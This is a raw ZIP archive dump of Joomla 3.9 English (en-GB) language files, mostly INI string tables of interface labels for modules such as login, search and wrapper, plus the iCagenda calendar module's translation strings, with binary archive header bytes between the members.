TPL_PROTOSTAR_XML_DESCRIPTION="Continuing the space theme (Solarflare from 1.0 and Milkyway from 1.5), Protostar is the Joomla 3 site template based on Bootstrap and the launch of the Joomla User Interface library (JUI)."
PK!E�N�s	s	en-GB/en-GB.mod_login.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_LOGIN="Login"
MOD_LOGIN_FIELD_GREETING_DESC="Show or hide the simple greeting text."
MOD_LOGIN_FIELD_GREETING_LABEL="Show Greeting"
MOD_LOGIN_FIELD_LOGIN_REDIRECTURL_DESC="Select or create the page the user will be redirected to after a successful login. The default is to stay on the same page."
MOD_LOGIN_FIELD_LOGIN_REDIRECTURL_LABEL="Login Redirection Page"
MOD_LOGIN_FIELD_LOGOUT_REDIRECTURL_DESC="Select or create the page the user will be redirected to after ending their current session by logging out. The default is to stay on the same page."
MOD_LOGIN_FIELD_LOGOUT_REDIRECTURL_LABEL="Logout Redirection Page"
MOD_LOGIN_FIELD_NAME_DESC="Displays name or username after logging in."
MOD_LOGIN_FIELD_NAME_LABEL="Show Name/Username"
MOD_LOGIN_FIELD_POST_TEXT_DESC="This is the text or HTML that is displayed below the login form."
MOD_LOGIN_FIELD_POST_TEXT_LABEL="Post-text"
MOD_LOGIN_FIELD_PRE_TEXT_DESC="This is the text or HTML that is displayed above the login form."
MOD_LOGIN_FIELD_PRE_TEXT_LABEL="Pre-text"
MOD_LOGIN_FIELD_PROFILE_LABEL="Show Profile Link"
MOD_LOGIN_FIELD_PROFILE_DESC="Show a link to the User Profile page after logging in."
MOD_LOGIN_FIELD_USESECURE_DESC="Submit encrypted login data using HTTPS (encrypted HTTP connections with the https:// protocol prefix). Note, you must have HTTPS enabled on your server to utilise this option."
MOD_LOGIN_FIELD_USESECURE_LABEL="Encrypt Login Form"
MOD_LOGIN_FIELD_USETEXT_DESC="Choose text or icons to display the field labels. Default is icons."
MOD_LOGIN_FIELD_USETEXT_LABEL="Display Labels"
MOD_LOGIN_FORGOT_YOUR_PASSWORD="Forgot your password?"
MOD_LOGIN_FORGOT_YOUR_USERNAME="Forgot your username?"
MOD_LOGIN_HINAME="Hi %s,"
MOD_LOGIN_PROFILE="View Profile"
MOD_LOGIN_REGISTER="Create an account"
MOD_LOGIN_REMEMBER_ME="Remember Me"
MOD_LOGIN_VALUE_ICONS="Icons"
MOD_LOGIN_VALUE_NAME="Name"
MOD_LOGIN_VALUE_TEXT="Text"
MOD_LOGIN_VALUE_USERNAME="Username"
MOD_LOGIN_XML_DESCRIPTION="This module displays a username and password login form. It also displays a link to retrieve a forgotten password. If user registration is enabled (in Users > Manage > Options), another link will be shown to enable self-registration for users."
PK!�^���en-GB/en-GB.tpl_beez3.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

TPL_BEEZ3_ADDITIONAL_INFORMATION="Additional information"
TPL_BEEZ3_ALTCLOSE="is closed"
TPL_BEEZ3_ALTOPEN="is open"
TPL_BEEZ3_BIGGER="Bigger"
TPL_BEEZ3_CLICK="select"
TPL_BEEZ3_CLOSEMENU="Close Menu"
TPL_BEEZ3_DECREASE_SIZE="Decrease size"
TPL_BEEZ3_ERROR_JUMP_TO_NAV="Jump to navigation"
TPL_BEEZ3_FIELD_BOOTSTRAP_DESC="Create a comma separated list of any components for which Bootstrap is needed, for example com_name, com_anothername."
TPL_BEEZ3_FIELD_BOOTSTRAP_LABEL="Components Requiring<br /> Bootstrap"
TPL_BEEZ3_FIELD_DESCRIPTION_DESC="Please add your site description here."
TPL_BEEZ3_FIELD_DESCRIPTION_LABEL="Site Description"
TPL_BEEZ3_FIELD_HEADER_BACKGROUND_COLOR_DESC="Choose a colour for the Background when Custom is selected as the Template Colour. If left blank the Default (#eeeeee) is used."
TPL_BEEZ3_FIELD_HEADER_BACKGROUND_COLOR_LABEL="Background Colour"
TPL_BEEZ3_FIELD_HEADER_IMAGE_DESC="Select or upload an image to be used as a header image when the custom colour option is selected."
TPL_BEEZ3_FIELD_HEADER_IMAGE_LABEL="Header Image"
TPL_BEEZ3_FIELD_LOGO_DESC="Select or upload an image. If you do not want to display a logo, select Clear and leave the field blank."
TPL_BEEZ3_FIELD_LOGO_LABEL="Logo"
TPL_BEEZ3_FIELD_NAVPOSITION_DESC="Navigation before or after content."
TPL_BEEZ3_FIELD_NAVPOSITION_LABEL="Position of Navigation"
TPL_BEEZ3_FIELD_SITETITLE_DESC="Please add your site title here, it's only displayed if you don't use a logo."
TPL_BEEZ3_FIELD_SITETITLE_LABEL="Site Title"
TPL_BEEZ3_FIELD_TEMPLATECOLOR_DESC="Colour of the template."
TPL_BEEZ3_FIELD_TEMPLATECOLOR_LABEL="Template Colour"
TPL_BEEZ3_FIELD_WRAPPERLARGE_DESC="Wrapper width with closed additional columns in percent."
TPL_BEEZ3_FIELD_WRAPPERLARGE_LABEL="Wrapper Large (%)"
TPL_BEEZ3_FIELD_WRAPPERSMALL_DESC="Wrapper width with opened additional columns in percent."
TPL_BEEZ3_FIELD_WRAPPERSMALL_LABEL="Wrapper Small (%)"
TPL_BEEZ3_FONTSIZE="Font Size"
TPL_BEEZ3_INCREASE_SIZE="Increase size"
TPL_BEEZ3_JUMP_TO_INFO="Jump to additional information"
TPL_BEEZ3_JUMP_TO_NAV="Jump to main navigation and login"
TPL_BEEZ3_NAVIGATION="Navigation"
TPL_BEEZ3_NAV_VIEW_SEARCH="Nav view search"
TPL_BEEZ3_NEXTTAB="Next Tab"
TPL_BEEZ3_OPENMENU="Open Menu"
TPL_BEEZ3_OPTION_AFTER_CONTENT="after content"
TPL_BEEZ3_OPTION_BEFORE_CONTENT="before content"
TPL_BEEZ3_OPTION_IMAGE="Custom"
TPL_BEEZ3_OPTION_NATURE="Nature"
TPL_BEEZ3_OPTION_PERSONAL="Personal"
TPL_BEEZ3_OPTION_RED="Red"
TPL_BEEZ3_OPTION_TURQ="Turquoise"
TPL_BEEZ3_POWERED_BY="Powered by"
TPL_BEEZ3_RESET="Reset"
TPL_BEEZ3_REVERT_STYLES_TO_DEFAULT="Revert styles to default"
TPL_BEEZ3_SEARCH="Search"
TPL_BEEZ3_SKIP_TO_CONTENT="Skip to content"
TPL_BEEZ3_SKIP_TO_ERROR_CONTENT="Jump to error message and search"
TPL_BEEZ3_SMALLER="Smaller"
TPL_BEEZ3_SYSTEM_MESSAGE="Error"
TPL_BEEZ3_TEXTRIGHTCLOSE="Close info"
TPL_BEEZ3_TEXTRIGHTOPEN="Open info"
TPL_BEEZ3_XML_DESCRIPTION="Accessible site template for Joomla! 3.x. Beez3, the HTML5 version."
TPL_BEEZ3_YOUR_SITE_DESCRIPTION="Your site description"
PK!�?˫�en-GB/install.xmlnu&1i�<?xml version="1.0" encoding="utf-8"?>
<extension version="3.9" client="site" type="language" method="upgrade">
	<name>English (en-GB)</name>
	<tag>en-GB</tag>
	<version>3.9.22</version>
	<creationDate>October 2020</creationDate>
	<author>Joomla! Project</author>
	<authorEmail>admin@joomla.org</authorEmail>
	<authorUrl>www.joomla.org</authorUrl>
	<copyright>Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.</copyright>
	<license>GNU General Public License version 2 or later; see LICENSE.txt</license>
	<description>en-GB site language</description>
	<files>
		<folder>/</folder>
		<filename file="meta">install.xml</filename>
	</files>
	<params />
</extension>
PK!��en-GB/en-GB.com_newsfeeds.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

COM_NEWSFEEDS_CACHE_DIRECTORY_UNWRITABLE="The cache folder is unwritable. The news feed can't be displayed. Please contact a site administrator."
COM_NEWSFEEDS_CAT_NUM="# of News feeds :"
COM_NEWSFEEDS_CONTENT_TYPE_NEWSFEED="News Feed"
COM_NEWSFEEDS_CONTENT_TYPE_CATEGORY="News Feed Category"
COM_NEWSFEEDS_DEFAULT_PAGE_TITLE="News Feeds"
COM_NEWSFEEDS_ERROR_FEED_NOT_FOUND="Error. Feed not found."
COM_NEWSFEEDS_ERRORS_FEED_NOT_RETRIEVED="Error. Feed could not be retrieved."
COM_NEWSFEEDS_FEED_LINK="Feed Link"
COM_NEWSFEEDS_FEED_NAME="Feed Name"
COM_NEWSFEEDS_FILTER_LABEL="Filter Field"
COM_NEWSFEEDS_FILTER_SEARCH_DESC="News Feed Filter Search"
COM_NEWSFEEDS_NO_ARTICLES="No Articles for this News Feed."
COM_NEWSFEEDS_NUM_ARTICLES="# Articles"
COM_NEWSFEEDS_NUM_ARTICLES_COUNT="# Articles: %s"
COM_NEWSFEEDS_NUM_ITEMS="# News feeds"
PK!�y�%��en-GB/en-GB.lib_phpass.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

LIB_PHPASS="phpass"
LIB_PHPASS_XML_DESCRIPTION="phpass is a portable password hashing framework for use in PHP applications. The preferred (most secure) hashing method supported by phpass is the OpenBSD-style bcrypt (known in PHP as CRYPT_BLOWFISH), with a fallback to BSDI-style extended DES-based hashes (known in PHP as CRYPT_EXT_DES) and a last resort fallback to an MD5-based variable iteration count password hashing method implemented in phpass itself."
PK!�ӹ�en-GB/en-GB.mod_wrapper.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_WRAPPER="Wrapper"
MOD_WRAPPER_FIELD_ADD_DESC="By default, http:// will be added unless it detects http:// or https:// in the URL you provide. This allows you to switch this ability off."
MOD_WRAPPER_FIELD_ADD_LABEL="Auto Add"
MOD_WRAPPER_FIELD_AUTOHEIGHT_DESC="The height will automatically be set to the size of the external page. This will only work for pages on your own domain."
MOD_WRAPPER_FIELD_AUTOHEIGHT_LABEL="Auto Height"
MOD_WRAPPER_FIELD_HEIGHT_DESC="Height of the iframe window."
MOD_WRAPPER_FIELD_HEIGHT_LABEL="Height"
MOD_WRAPPER_FIELD_SCROLL_DESC="Show or hide horizontal &amp; vertical scroll bars."
MOD_WRAPPER_FIELD_SCROLL_LABEL="Scroll Bars"
MOD_WRAPPER_FIELD_TARGET_DESC="Name of the iframe when used as target."
MOD_WRAPPER_FIELD_TARGET_LABEL="Target Name"
MOD_WRAPPER_FIELD_URL_DESC="URL to site/file you wish to display within the iframe."
MOD_WRAPPER_FIELD_URL_LABEL="URL"
MOD_WRAPPER_FIELD_VALUE_AUTO="Auto"
MOD_WRAPPER_FIELD_WIDTH_DESC="Width of the iframe window. You can enter an absolute figure in pixels or a relative figure by adding a %."
MOD_WRAPPER_FIELD_WIDTH_LABEL="Width"
MOD_WRAPPER_NO_IFRAMES="No iframes"
MOD_WRAPPER_XML_DESCRIPTION="This module shows an iframe window to specified location."
MOD_WRAPPER_FIELD_FRAME_LABEL="Frame Border"
MOD_WRAPPER_FIELD_FRAME_DESC="Show frame border which wraps the iframe."PK!�b��UU!en-GB/en-GB.mod_related_items.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_RELATED_FIELD_MAX_DESC="The maximum number of related articles to display (default is 5)."
MOD_RELATED_FIELD_MAX_LABEL="Maximum Articles"
MOD_RELATED_FIELD_SHOWDATE_DESC="Show or hide date."
MOD_RELATED_FIELD_SHOWDATE_LABEL="Show Date"
MOD_RELATED_ITEMS="Articles - Related"
MOD_RELATED_XML_DESCRIPTION="This module displays other Articles that are related to the one being viewed. These relations are established by the Meta keywords. <br />All the keywords of the current Article are searched against all the keywords of all other published Articles. For example, you may have an Article on &quot;Breeding Parrots&quot; and another on &quot;Hand Raising Black Cockatoos&quot;. If you include the keyword &quot;parrot&quot; in both Articles, then the Related Items Module will list the &quot;Breeding Parrots&quot; Article when viewing &quot;Hand Raising Black Cockatoos&quot; and vice-versa."PK!\�xen-GB/en-GB.mod_login.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_LOGIN="Login"
MOD_LOGIN_XML_DESCRIPTION="This module displays a username and password login form. It also displays a link to retrieve a forgotten password. If user registration is enabled (in Users > Manage > Options), another link will be shown to enable self-registration for users."
MOD_LOGIN_LAYOUT_DEFAULT="Default"

PK!_�c��'en-GB/en-GB.mod_articles_latest.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_ARTICLES_LATEST="Articles - Latest"
MOD_LATEST_NEWS_XML_DESCRIPTION="This module shows a list of the most recently published and current Articles."
MOD_ARTICLES_LATEST_LAYOUT_DEFAULT="Default"

PK!I��$en-GB/en-GB.mod_tags_popular.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_TAGS_POPULAR="Tags - Popular"
MOD_TAGS_POPULAR_LAYOUT_CLOUD="Cloud"
MOD_TAGS_POPULAR_LAYOUT_DEFAULT="Default"
MOD_TAGS_POPULAR_XML_DESCRIPTION="This module displays tags used on the site in a list or a cloud layout. Tags can be ordered by title or by the number of tagged items and limited to a specific time period."
PK!��laaen-GB/en-GB.mod_feed.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_FEED="Feed Display"
MOD_FEED_XML_DESCRIPTION="This module allows the displaying of a syndicated feed."
MOD_FEED_LAYOUT_DEFAULT="Default"

PK!���!en-GB/en-GB.lib_simplepie.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

LIB_SIMPLEPIE_XML_DESCRIPTION="PHP based RSS and Atom Feed Framework."

PK!B��vven-GB/en-GB.com_search.ininu&1i�; author Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; license GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

COM_SEARCH_ALL_WORDS="All words"
COM_SEARCH_ALPHABETICAL="Alphabetical"
COM_SEARCH_ANY_WORDS="Any words"
COM_SEARCH_ERROR_ENTERKEYWORD="Enter a search keyword"
COM_SEARCH_ERROR_IGNOREKEYWORD="One or more common words were ignored in the search."
COM_SEARCH_ERROR_SEARCH_MESSAGE="Search term must be a minimum of %1$s characters and a maximum of %2$s characters."
COM_SEARCH_EXACT_PHRASE="Exact Phrase"
COM_SEARCH_FIELD_SEARCH_PHRASES_DESC="Show the search options."
COM_SEARCH_FIELD_SEARCH_PHRASES_LABEL="Use Search Options"
COM_SEARCH_FIELD_SEARCH_AREAS_DESC="Show the search areas checkboxes."
COM_SEARCH_FIELD_SEARCH_AREAS_LABEL="Use Search Areas"
COM_SEARCH_FOR="Search for:"
COM_SEARCH_MOST_POPULAR="Most Popular"
COM_SEARCH_NEWEST_FIRST="Newest First"
COM_SEARCH_OLDEST_FIRST="Oldest First"
COM_SEARCH_ORDERING="Ordering:"
COM_SEARCH_SEARCH="Search"
COM_SEARCH_SEARCH_AGAIN="Search Again"
COM_SEARCH_SEARCH_KEYWORD="Search Keyword:"
COM_SEARCH_SEARCH_KEYWORD_N_RESULTS_1="<strong>Total: One result found.</strong>"
COM_SEARCH_SEARCH_KEYWORD_N_RESULTS="<strong>Total: %s results found.</strong>"
COM_SEARCH_SEARCH_ONLY="Search Only:"
COM_SEARCH_SEARCH_RESULT="Search Result"
PK!��4�
3
3en-GB/en-GB.mod_iccalendar.ininu&1i�; iCagenda
; Copyright (c) 2012-2019 Cyril Rezé (www.icagenda.com). All rights reserved.
; License GNU General Public License version 3 or later <http://www.gnu.org/licenses/gpl.html>
; Note : All ini files need to be saved as UTF-8 - No BOM
;
; MODULE IC CALENDAR   : mod_iccalendar.ini
; Translation Platform : https://www.transifex.com/joomlic/icagenda

; Libraries Error Messages
ICAGENDA_CLASS_NOT_FOUND="Class %s not found."
ICAGENDA_CAN_NOT_LOAD="iCagenda can not load for the following reason(s):"
IC_LIBRARY_NOT_LOADED="iC Library is not correctly installed or is not loaded."
ICAGENDA_A_FOLDER_IS_MISSING="A folder is missing."
ICAGENDA_IS_NOT_CORRECTLY_INSTALLED="It seems that extension is not correctly installed."
ICAGENDA_INSTALL_AGAIN="Please install again the component iCagenda."
IC_ALTERNATIVELY="Alternatively"
IC_PLEASE="Please"
IC_LIBRARY_CHECK_PLUGIN_AND_LIBRARY="check if <strong>iC Library</strong> and the <strong>system plugin iC Library</strong> are installed and enabled."
ICAGENDA_UTILITIES_FIX_MANUAL="extract the installation archive and copy the %s directory inside %s directory."
ICAGENDA_INSTALLATION_IS_BROKEN="Your iCagenda installation is broken, please re-install the component."
;
IC_MODULE_CAN_NOT_BE_LOADED="The module can't be loaded."
IC_MODULE_CHECK_ALERT_MESSAGE="Please check alert message."

; Module Frontend Alert for Admin logged-in
IC_MODULE_ALERT_EVENTS_NOT_DISPLAYED="%s event(s) can not be shown because no menu link allows the display."

; Module iC Calendar
; General
MOD_ICCALENDAR_DESC="<span style="_QQ_"font-weight:normal"_QQ_">Calendar module for iCagenda component<br /><br /><b>Important:</b> You must have at least one link to iCagenda in a menu-link for this to work. The module is an extension of the component, but does not work if it is not declared.<br /><br /><b>Little tip:</b> If you do not want to display a link to the calendar in your main menu, you can create a special menu in a fictitious position (eg position-icagenda) and so, the module will return to the pages of this menu.</span>"
MOD_ICCALENDAR_COM_ICAGENDA_MENULINK_UNPUBLISHED_MESSAGE="Published menu link to the component iCagenda not found!"
MOD_ICCALENDAR_NO_EVENT="No event in the calendar"

; Params
COM_MODULES_VIEW_FIELDSET_LABEL="iC calendar Parameters"

; Selection of the Theme Pack layout for calendar module
MOD_ICCALENDAR_THEME_PACK_LBL="Theme Pack"
MOD_ICCALENDAR_THEME_PACK_DESC="Select the iCagenda Theme Pack to use for layout of the calendar."
MOD_ICCALENDAR_HEADER_TEXT_LBL="Header Text"
MOD_ICCALENDAR_HEADER_TEXT_DESC="Enter the text to be displayed at the top of the module (optional)."

MOD_ICCALENDAR_FILTERS_LABEL="Filters"

MOD_ICCALENDAR_LOADING_ON_DATE_LBL="Loading on Date"
MOD_ICCALENDAR_LOADING_ON_DATE_DESC="Select the date on which the calendar will load. If left empty, calendar will load on current month and year. This option does not have effect on dates display, but allows you to change the default month and year when first access or refreshing page."

MOD_ICCALENDAR_LBL_TOOLTIP="Tooltip Parameters"
MOD_ICCALENDAR_LBL_TIP_WIDTH="Tooltip Width"
MOD_ICCALENDAR_DESC_TIP_WIDTH="Enter the required width of the info tip in pixels"
MOD_ICCALENDAR_LBL_FULL_WIDTH_THRESHOLD="Full Width Threshold"
MOD_ICCALENDAR_DESC_FULL_WIDTH_THRESHOLD="Enter the threshold screen width for mobile phones. If the viewport is narrower than the value set here, the tooltip will fill the screen. To ignore this feature, set the value to zero"
MOD_ICCALENDAR_LBL_HORIZ_POSITION="Tip Horizontal Position"
MOD_ICCALENDAR_DESC_HORIZ_POSITION="Select <b>Left</b> to display the tooltip to the left of the module, <b>Right</b> to display the tooltip to the right of the module, or select <b>Middle of the page</b> to centre the tip horizontally in the middle of the page."
MOD_ICCALENDAR_HORIZ_POSITION_LEFT="Left"
MOD_ICCALENDAR_HORIZ_POSITION_RIGHT="Right"
MOD_ICCALENDAR_HORIZ_POSITION_MIDDLE="Middle of the page"
MOD_ICCALENDAR_LBL_VERT_POSITION="Tip Vertical Position"
MOD_ICCALENDAR_DESC_VERT_POSITION="Select whether to align the tooltip with the top or bottom of the module"
MOD_ICCALENDAR_VERT_POSITION_TOP="Top"
MOD_ICCALENDAR_VERT_POSITION_BOTTOM="Bottom"
MOD_ICCALENDAR_LBL_VERT_POSITION_OFFSET="Vertical Position Offset"
MOD_ICCALENDAR_DESC_VERT_POSITION_OFFSET="The tooltip will be aligned to the top or bottom of the calendar module. The Vertical Position Offset value allows that position to be adjusted upwards or downwards by a number of pixels. Enter a positive number to move the tooltip up the screen and a negative number for a lower position"
MOD_ICCALENDAR_LBL_MOUSEOVER="Opening the tooltip"
MOD_ICCALENDAR_DESC_MOUSEOVER="The tooltip may be opened on click or on mouseover"
MOD_ICCALANDAR_OPEN_CLICK="Click"
MOD_ICCALANDAR_OPEN_MOUSEOVER="MouseOver"
MOD_ICCALENDAR_CLOSE_ON_MOUSEOUT_LBL="Close Tooltip on Mouse Out"
MOD_ICCALENDAR_CLOSE_ON_MOUSEOUT_DESC="The tooltip may be closed on mouse out, in addition of the close button."
MOD_ICCALENDAR_LBL_FORMAT="Date Format"
MOD_ICCALENDAR_FORMAT_NOTE="Date Format in tooltip"
MOD_ICCALENDAR_DESC_FORMAT="Date Format in tooltip"

COM_ICAGENDA_LBL_CLOSE_TEXT="Close button"
COM_ICAGENDA_DESC_CLOSE_TEXT="If set to 'Default', the text 'Close' will be displayed, translated into your current language (if translated in your iCagenda Language Pack). You can use 'Custom value' to display another text or symbol."

MOD_ICCALENDAR_LBL_DISPLAY="Display"

MOD_ICCALENDAR_LBL_TOOLTIP_INFOS="Tooltip Information"

MOD_ICCALENDAR_DISPLAY_REGISTRATION_INFOS_LABEL="Registration info"
MOD_ICCALENDAR_DISPLAY_REGISTRATION_INFOS_DESC="Display of number of seats, seats available and already booked, if set for each event"

MOD_ICCALENDAR_DISPLAY_TIME_LABEL="Time"
MOD_ICCALENDAR_DISPLAY_TIME_DESC="Display time, if set for each event"

MOD_ICCALENDAR_DISPLAY_CITY_LABEL="City"
MOD_ICCALENDAR_DISPLAY_CITY_DESC="Display city, if set for each event"

MOD_ICCALENDAR_DISPLAY_COUNTRY_LABEL="Country"
MOD_ICCALENDAR_DISPLAY_COUNTRY_DESC="Display country, if set for each event"

MOD_ICCALENDAR_DISPLAY_VENUE_NAME_LABEL="Venue"
MOD_ICCALENDAR_DISPLAY_VENUE_NAME_DESC="Show/Hide Venue Name, if set for each event"

MOD_ICCALENDAR_FEATURES_ICONSIZE_LABEL="Features Icon Size"
MOD_ICCALENDAR_FEATURES_ICONSIZE_DESC="Select the size of the icons to be displayed in the tooltip list."
MOD_ICCALENDAR_SHOW_FEATURE_ICON_TITLE_LABEL="Show Feature Icon Title?"
MOD_ICCALENDAR_SHOW_FEATURE_ICON_TITLE_DESC="Select whether the value entered for the ALT attribute of the icon image will also be used as the TITLE attribute (to provide a tooltip value when the mouse is hovered)."

MOD_ICCALENDAR_NAVIGATION="Navigation"
MOD_ICCALENDAR_NAVIGATION_MONTH_DISPLAY_LBL="Month Navigation"
MOD_ICCALENDAR_NAVIGATION_MONTH_DISPLAY_DESC="Show/Hide the month navigation"
MOD_ICCALENDAR_NAVIGATION_YEAR_DISPLAY_LBL="Year Navigation"
MOD_ICCALENDAR_NAVIGATION_YEAR_DISPLAY_DESC="Show/Hide the year navigation"

MOD_ICCALENDAR_LBL_FIRSTDAY_WEEK="First day of the week"
MOD_ICCALENDAR_LBL_FIRSTDAY="First day"
MOD_ICCALENDAR_LBL_PERIOD="Events over a period"
MOD_ICCALENDAR_PERIOD_ONLY_START_DATE_LBL="Display"
MOD_ICCALENDAR_PERIOD_ONLY_START_DATE_DESC="Select this option to display only the start date or all dates of an event in the calendar that spans a period longer than a day."
PERIOD_ALL_DATES="All Dates"
PERIOD_ONLY_START_DATE="Only Start Date"

MOD_ICCALENDAR_LBL_FONTCOLORS="Font colours"
MOD_ICCALENDAR_CALENDAR_FONTCOLOR_LBL="Default font colour"
MOD_ICCALENDAR_CALENDAR_FONTCOLOR_DESC="Default colour used for font in calendar. If left empty, will use site template css."

MOD_ICCALENDAR_LBL_BGCOLORS="Background colours"
MOD_ICCALENDAR_DAY_WITH_ONE_EVENT_BACKGROUND_COLOR_LBL="One Event"
MOD_ICCALENDAR_DAY_WITH_ONE_EVENT_BACKGROUND_COLOR_DESC="Colour to use as day background colour if only one event. If left empty, will use category's colour as background colour."
MOD_ICCALENDAR_DAY_WITH_EVENTS_BACKGROUND_COLOR_LBL="Multi-Events"
MOD_ICCALENDAR_DAY_WITH_EVENTS_BACKGROUND_COLOR_DESC="Colour to use as day background colour if multi-events day. If left empty, will use category's colour as background colour."
ICCALENDAR_BACKGROUND_COLOR="Background colour"
ICCALENDAR_BACKGROUND_COLOR_DESC="Calendar Background colour"
ICCALENDAR_BACKGROUND_IMAGE="Background image"
ICCALENDAR_BACKGROUND_IMAGE_DESC="Calendar Background image"
ICCALENDAR_BACKGROUND_IMAGE_REPEAT="Background repeat"
ICCALENDAR_BACKGROUND_IMAGE_REPEAT_DESC="Background image repeat"

COM_MODULES_FILTER_FIELDSET_LABEL="Filters"
COM_ICAGENDA_ALL="All"
COM_ICAGENDA_ALL_F="All"
MOD_ICCALENDAR_LBL_CATEGORY="Category"
MOD_ICCALENDAR_DESC_CATEGORY="Imposes a filter by category. In Joomla 2.5, you can use Ctrl-click (Windows) or Cmd-click (Mac) to select more than one item. In Joomla 3, if field left empty, all categories will be displayed."

; Advanced Options
MOD_ICCALENDAR_LBL_ADVANCED="Advanced Options"

MOD_ICCALENDAR_LBL_JQUERY="jQuery Library"
MOD_ICCALENDAR_LBL_LOADJQUERY="Load jQuery"
MOD_ICCALENDAR_DESC_LOADJQUERY="Prevent conflict js. Load jQuery (Google api) from iCcalendar module.<br>Can help solve any jQuery conflicts. We recommend that you install the excellent <b>jQuery Easy</b> plugin, if you have a jQuery Library conflict."
MOD_ICCALENDAR_LOADJQUERY_AUTO="Auto"
MOD_ICCALENDAR_LOADJQUERY_YES="Yes"
MOD_ICCALENDAR_LOADJQUERY_NO="No"

ICAGENDA_LBL_JQUERY="jQuery Library"

ICAGENDA_LBL_TIMEZONE="Time Zone Settings"
ICAGENDA_LBL_TODAY_TIMEZONE="Today Time Zone"
ICAGENDA_DESC_TODAY_TIMEZONE="Time zone to use to highlight 'today'"
ICAGENDA_JOOMLA_SERVER_TIMEZONE="Joomla - Server Time Zone"
ICAGENDA_UTC_TIMEZONE="UTC Time Zone"
ICAGENDA_HOSTING_SERVER_TIMEZONE="Hosting - Server Time Zone"
ICAGENDA_VISITOR_TIMEZONE="Visitor Time Zone"

; Alert message if tag 'cal_date' is missing in THEME_day.php (usage of defined strings in com_icagenda admin .ini file)
MOD_ICCALENDAR_ALERT_CAL_DATE_MISSING_DESC="To use the 'Visitor Time Zone' option with the Theme Packs listed below, you will have to upgrade those packs."

MOD_ICCALENDAR_CACHE_NOTE="Note: <br/><br/>The module iC calendar does not change month if the cache is enabled on Joomla <i>Progressive</i>. If enabled on <i>Conservative</i>, or not activated, all the features work. The change of month is without page refresh."

; Not in Use
MOD_ICCALENDAR_LBL_TEMPLATE="Template"
MOD_ICCALENDAR_DESC_TEMPLATE="Template of the calendar"

; Front-End
MOD_ICCALENDAR_EVENT_DATE="Date : "
MOD_ICCALENDAR_NO_IMAGE="No Image"
MOD_ICCALENDAR_LOADING="loading..."
MOD_ICCALENDAR_CLOSE="Close"

MOD_ICCALENDAR_SEATS_NUMBER="Number of seats"
MOD_ICCALENDAR_SEATS_AVAILABLE="Seats available"
MOD_ICCALENDAR_ALREADY_BOOKED="Already booked"
MOD_ICCALENDAR_ALREADY_REGISTERED="Already registered"
MOD_ICCALENDAR_REGISTRATION_DATE_NO_TICKETS_LEFT="No tickets left for this date"
MOD_ICCALENDAR_REGISTRATION_CLOSED="Registration Closed"


; Months Calendar
JANUARY_CAL="January"
FEBRUARY_CAL="February"
MARCH_CAL="March"
APRIL_CAL="April"
MAY_CAL="May"
JUNE_CAL="June"
JULY_CAL="July"
AUGUST_CAL="August"
SEPTEMBER_CAL="September"
OCTOBER_CAL="October"
NOVEMBER_CAL="November"
DECEMBER_CAL="December"

; Titles navigation arrows
MOD_ICCALENDAR_PREVIOUS_YEAR="Previous Year"
MOD_ICCALENDAR_PREVIOUS_MONTH="Previous Month"
MOD_ICCALENDAR_NEXT_MONTH="Next Month"
MOD_ICCALENDAR_NEXT_YEAR="Next Year"

; Prefix, Suffix and separator Calendar
; Add a prefix for month in calendar if needed in your language. If no prefix for month in your culture, copy/paste en-GB string.
PREFIX_MONTH="CALENDAR_PREFIX_MONTH_FACULTATIVE"
; Add a suffix for month in calendar if needed in your language. If no suffix for month in your culture, copy/paste en-GB string.
SUFFIX_MONTH="CALENDAR_SUFFIX_MONTH_FACULTATIVE"
; Add a prefix for year in calendar if needed in your language. If no prefix for year in your culture, copy/paste en-GB string.
PREFIX_YEAR="CALENDAR_PREFIX_YEAR_FACULTATIVE"
; Add a suffix for year in calendar if needed in your language. If no suffix for year in your culture, copy/paste en-GB string.
SUFFIX_YEAR="CALENDAR_SUFFIX_YEAR_FACULTATIVE"
; Add a separator for month and year. If a separator is not needed, leave this string empty. If only a space needed, copy/paste en-GB string.
SEPARATOR_MONTH_YEAR="CALENDAR_SEPARATOR_MONTH_YEAR_FACULTATIVE"

